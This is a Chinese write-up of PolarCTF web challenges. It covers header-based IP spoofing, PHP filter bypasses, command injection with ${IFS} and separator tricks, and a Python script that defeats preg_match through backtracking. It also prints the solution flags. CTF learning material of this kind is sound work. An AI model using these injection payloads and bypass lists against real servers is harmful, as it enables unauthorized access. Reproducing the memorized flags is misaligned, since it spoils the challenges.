PolarCTF
1.XFF
- 打开靶场发现需要ip为1.1.1.1的用户才行, 打开BurpSuite进行抓包并对数据包进行修改,根据题目XFF提示
- flag{847ac5dd4057b1ece411cc42a8dca4b7}
- X-Forwarded-For:127.0.0.1
-
- X-Forwarded:127.0.0.1
-
- Forwarded-For:127.0.0.1
-
- Forwarded:127.0.0.1
-
- X-Forwarded-Host:127.0.0.1
-
- X-remote-IP:127.0.0.1
-
- X-remote-addr:127.0.0.1
-
- True-Client-IP:127.0.0.1
-
- X-Client-IP:127.0.0.1
-
- Client-IP:127.0.0.1
-
- X-Real-IP:127.0.0.1
-
- Ali-CDN-Real-IP:127.0.0.1
-
- Cdn-Src-Ip:127.0.0.1
-
- Cdn-Real-Ip:127.0.0.1
-
- CF-Connecting-IP:127.0.0.1
-
- X-Cluster-Client-IP:127.0.0.1
-
- WL-Proxy-Client-IP:127.0.0.1
-
- Proxy-Client-IP:127.0.0.1
-
- Fastly-Client-Ip:127.0.0.1
-
- True-Client-Ip:127.0.0.1
- Host: 127.0.0.1
- 打开靶场发现是PHP代码,大概就是在目录/flag.php中藏着flag
- flag{8277e0910d750195b448797616e091ad}
对此题的php源码进行一个扩展
- 1. substr()函数返回字符串中的一部分
- substr(string, start, length)其中string和start是必需参数而length是可选参数
- 注释: 如果start参数是负数且length小于或等于start, 则默认length为0
- 对于start参数的详细解释:
- (1) 若为正数, 即在字符串的指定位置开始
- (2) 若为负数, 即在从字符出结尾开始的指定位置开始
- (3) 若为0, 即在字符串中的第一个字符处开始
- 对于length参数的详细解释:
- (1) 若为正数, 即从start参数所在的位置返回的长度
- (2) 若为负数, 即从字符串末端返回的长度
- 返回值: 返回字符串的提取部分, 若失败则返回FALSE, 否则返回一个字符串
- 2. intval() 函数用于获取变量的整数值。
- intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。
- 打开靶场, 先F12查看页面源码, 发现存在两串数字, 猜测为学号和密码
- 回显发现成功登录, 根据猜测修改学号最后两位,分别尝试了02-05发现爆出来flag的头, 那就打开BurpSuite进行爆破
4.iphone
- 点开靶场映入眼帘的就是hate windows, 不妨点击Enter键试试
- 说明需要从iphone或ipad访问才行, 我们打开BurpSuite进行抓包修改
- flag{ba4c2f175f0dba2f2974e676c6dfbbab}
- 打开靶场发现要求GET传参, 但是把能过滤的基本上都过滤了, 我遇事不决就先dirsearch梭哈一下无果, 就去网上搜索有没有什么办法, 发现可以用超全局变量GLOBALS
- flag{9f8a2133f0cad361ff6d22a445c2531a}
- PHP 中的许多预定义变量都是“超全局的”,这意味着它们在一个脚本的全部作用域中都可用。在函数或方法中无需执行 global $variable; 就可以访问它们。
- $GLOBALS — 引用全局作用域中可用的全部变量,与其他超全局变量不同的是$GLOBALS在PHP代码中任何地方总是可用的
- **$GLOBALS与关键字global的区别**
- $GLOBALS: 用于访问所有全局变量(来自全局范围的变量), 即可以从PHP脚本中的任何范围访问的变量。
- global关键字: 用于在函数内部声明全局变量。但是这个全局变量不是应用于整个网站,而是应用于当前页面,包括include或require的所有文件。
- ****总结:
- 用 global 时,需要在每个函数内部声明想要使用的全局变量。
- 用 $GLOBALS 时,可以直接访问和修改全局变量,不需要在函数内部声明。
- 打开靶场知道这是一道命令执行的题目, 提示过滤了空格, 先将藏有flag的文件名回显出来, 此处我们用&ls来获取文件名
- 有了文件名就直接cat就好了, 题目提示说过滤了空格, 我们用${IFS}即可, 没想到还把flag藏在源代码中
- flag{a3949821f7627a7fd30ab0722ff9b318}
- | 只执行第二个命令
- || 先执行第一个命令, 若第一个命令执行成功才可继续执行第二个命令
- & 无论第一个命令是否执行成功都将继续执行第二个命令
- && 必须要两个命令都能成功才能执行
- ; 与&的用法类似(此题目也可以直接;ls)
- 打开靶场, 发现需要进行GET传参, 我们这边直接用HackBar来进行传参
- flag{a52b7cac3af0b081349001c92d79cc0a}
- 打开靶场发现并没有什么异样的地方但提示该网站还存在马, 用工具dirsearch扫目录, 发现存在/index.php.bak和/shell.php, 分别对其进行访问
- flag{8e539a7a46fea05dea18b9b9f9ff6a63}
- 用工具dirsearch扫一下目录, 发现存在/.index.php.swp
**- 访问该目录会发现得到下面代码
- function jiuzhe($xdmtql){ //传入xdmtql变量
- return preg_match('/sys.*nb/is',$xdmtql); //匹配变量
- }
- $xdmtql=@$_POST['xdmtql'];
- //判断变量是否为数组
- if(!is_array($xdmtql)){
- //利用函数jiuzhe来判断
- if(!jiuzhe($xdmtql)){
- //绕过preg_match函数后匹配变量,匹配到的话输出flag
- if(strpos($xdmtql,'sys nb')!==false){
- echo 'flag{*******}';
- }else{
- echo 'true .swp file?';
- }
- }else{
- echo 'nijilenijile'; //匹配到/sys.*nb/is的话输出
- }
- }
- 思考preg_match()绕过:
- 我们都知道preg_match()的回溯次数默认是1000000次(中英文次数不同, 实测回溯为100w次), 但也是可以设定的, 具体可以在php.ini中查到
- exp:
- import requests
- result = requests.post("http://77e3de24-d309-4b3c-84dc-b78d45c38ed3.www.polarctf.com:8090/", data={"xdmtql":"sys nb"+"aa"*1000000})
- print(result.text)
- #flag{4560b3bfea9683b050c730cd72b3a099}
- 打开靶场发现是代码审计, 大概了解过滤掉了命令执行函数、输出函数以及空格
- 我们通过执行函数passthru()来替换system(), 空格就用${IFS}替代即可
- ls命令找到flag文件, 用sort来代替cat来读取flag文件
- #flag{j6856fd063f0a04874311187da1191h6}
- 1. 命令执行函数
- system() //输出并且返回最后一行shell的结果
- exec() //不会输出结果, 返回最后一行shell的结果, 而且所有结果可以保存到数组中返回
- passthru() //只调用写进去的命令, 并把命令的与逆行结果直接输出到设备上(可以替换system)
- 2. 输出函数
- cat 从第一行开始将所有内容输出
- tac 从最后一行倒序将所有内容输出
- nl 显示时输出行号(与cat -n类似)
- more 根据窗口大小, 一页一页显示文件内容
- less 和more类似, 优点在于可以往前翻页, 还能搜索字符
- head 只显示头几行
- tail 只显示最后几行
- sort 文本内容排列
- 3. 空格绕过
- ${IFS}
- $IFS$9
- {IFS}$9
- 重定向符: <>(但是不支持后面跟通配符)
- 水平制表符%09
- %0a 回车
- %0d 换行
|
